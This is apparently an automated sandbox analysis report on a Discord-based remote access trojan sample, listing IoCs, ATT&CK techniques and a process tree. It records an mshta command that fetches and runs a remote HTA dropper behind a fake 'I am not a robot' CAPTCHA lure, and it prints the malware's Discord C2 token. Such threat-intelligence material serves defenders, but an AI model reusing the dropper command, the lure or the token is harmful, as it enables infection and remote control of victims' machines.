discordrat | 984fcd7ad0ccc5974c2944c8164ee365753bd64edac36cb9cbc5e46099c07555

Analysis

max time kernel
468s
max time network
470s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-12-2024 17:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

settings.xml
Size

3KB
MD5

f5466c60260c65e6b5b31104cb364ea5
SHA1

fabaabd4153c5bac3c2eb7942d1590ab46f923b8
SHA256

984fcd7ad0ccc5974c2944c8164ee365753bd64edac36cb9cbc5e46099c07555
SHA512

e2e73d7dbdd6e043dae5ad147d67701a2e64da7e987df0187221b2d1af616dfe594712d4733470adba3c4c802e9041a6c3fa0bb2406a7e4e8062662a0c6f7a09

Score

10^/10

discordrat discovery persistence rat rootkit stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://oooovchheayt3.github.io/Tools/Verification.html

Extracted

Family

discordrat

Attributes

discord_token
MTMxMzUwNTc1ODQ3MzYyMTUxNA.GEstRj.TKeczpDrTK0oQpy8R4VP1ZtwXAi2iFDXFb9V0Y
server_id
1252699178128375888

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exemshta.exe

flow	pid	Process
140	3252	mshta.exe
141	3252	mshta.exe
155	4880	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks processor information in registry 2 TTPs 23 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exeEXCEL.EXEfirefox.exefirefox.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEchrome.exemsedge.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133777209931590110"	chrome.exe

Modifies registry class 1 IoCs

Processes:

firefox.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	firefox.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

Notepad.exe

pid	Process
5068	Notepad.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
4376	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

chrome.exechrome.exemsedge.exemsedge.exemsedge.exe

pid	Process
1216	chrome.exe
1216	chrome.exe
4624	chrome.exe
4624	chrome.exe
4624	chrome.exe
4624	chrome.exe
4836	msedge.exe
4836	msedge.exe
3764	msedge.exe
3764	msedge.exe
1816	msedge.exe
1816	msedge.exe
1816	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

Processes:

chrome.exemsedge.exe

pid	Process
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	Process
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exemsedge.exe

pid	Process
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exemsedge.exe

pid	Process
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe
3764	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

firefox.exeEXCEL.EXE

pid	Process
2092	firefox.exe
4376	EXCEL.EXE
4376	EXCEL.EXE
4376	EXCEL.EXE
4376	EXCEL.EXE
4376	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	Process	procid_target
PID 1216 wrote to memory of 2912	1216	chrome.exe	88
PID 1216 wrote to memory of 2912	1216	chrome.exe	88
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 4980	1216	chrome.exe	89
PID 1216 wrote to memory of 1172	1216	chrome.exe	90
PID 1216 wrote to memory of 1172	1216	chrome.exe	90
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91
PID 1216 wrote to memory of 2076	1216	chrome.exe	91

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\settings.xml"
1⤵
PID:3408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed5b1cc40,0x7ffed5b1cc4c,0x7ffed5b1cc58
  2⤵
  PID:2912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2044,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:2
  2⤵
  PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1912,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2064 /prefetch:3
  2⤵
  PID:1172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1648 /prefetch:8
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:2344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4500 /prefetch:1
  2⤵
  PID:4444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4824,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
  2⤵
  PID:2308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4960 /prefetch:8
  2⤵
  PID:3584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4948 /prefetch:8
  2⤵
  PID:3284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5284,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5296 /prefetch:8
  2⤵
  PID:4120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4364,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4960 /prefetch:8
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:4916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5404,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:2
  2⤵
  PID:1552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4792,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3248,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5092 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5220,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5444 /prefetch:1
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4984,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:2268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4964,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5264 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5240,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:3536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=3384,i,1982338966298959598,10109229868989161958,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
  2⤵
  PID:4876

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3148

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://oooovchheayt3.github.io/Tools/Verification.html # ☑ ''I am not a robot - LTCaptcha Verification ID: 85239''
1⤵
- Blocklisted process makes network request
PID:3252

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\28fcba112cc94148a8ed37a397d606d7 /t 3216 /p 3252
1⤵
PID:4592

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://oooovchheayt3.github.io/Tools/Verification.html # ☑ ''I am not a robot - LTCaptcha Verification ID: 85239''
1⤵
- Blocklisted process makes network request
PID:4880

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\d3ff14102ce149ae93095f50105823b8 /t 1144 /p 4880
1⤵
PID:1572

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\asdasd.vbs
1⤵
- Opens file in notepad (likely ransom note)
PID:5068

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1776

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\asdasd.vbs"
1⤵
PID:812

C:\Windows\System32\WScript.exe
